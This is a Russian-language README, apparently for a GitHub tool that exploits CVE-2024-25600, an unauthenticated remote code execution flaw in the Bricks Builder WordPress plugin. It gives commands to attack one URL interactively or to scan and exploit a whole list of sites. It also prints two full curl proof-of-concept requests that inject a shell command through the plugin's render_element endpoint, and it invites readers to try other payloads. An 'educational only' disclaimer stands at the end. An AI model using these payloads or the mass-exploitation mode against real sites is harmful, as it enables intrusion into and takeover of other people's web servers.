
Этот инструмент предназначен для эксплуатации уязвимости CVE-2024-25600, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет выполнять удаленный код без аутентификации на уязвимых сайтах. Инструмент автоматизирует процесс эксплуатации, получая nonces и отправляя специально сформированные запросы для выполнения произвольных команд.
Этот инструмент 🛠️ предназначен для эксплуатации уязвимости CVE-2024-25600 🕳️, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на затронутых сайтах 💻. Инструмент автоматизирует процесс эксплуатации путем получения nonce и отправки специально сформированных запросов для выполнения произвольных команд.
git clone.pip install -r requirements.txt.python exploit.py -u <URL>, чтобы начать интерактивный режим.python exploit.py -l <путь_к_файлу>, чтобы просканировать и эксплуатировать перечисленные сайты.Базовый PoC, предоставленный разглашением, выглядит следующим образом:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Обновление: Второй PoC (более надежный)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Возможно, что дополнительные полезные нагрузки могут дать лучшие результаты. Если мой эксплойт или доказательство концепции не работают для вас, я призываю вас экспериментировать с альтернативными полезными нагрузками, чтобы найти более эффективное решение.
Замените [HOST] на целевой сайт, а [NONCE] на значение nonce, полученное с сайта.
Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному разглашению на Snicco.io.
Информация, предоставленная в этом README, предназначена только для образовательных целей. Несанкционированный взлом веб-сайтов или сетей является незаконным и неэтичным. 🚫
Благодарность исследователям безопасности, которые обнаружили и сообщили об этой уязвимости, предоставив сообществу информацию и инструменты для защиты веб-приложений.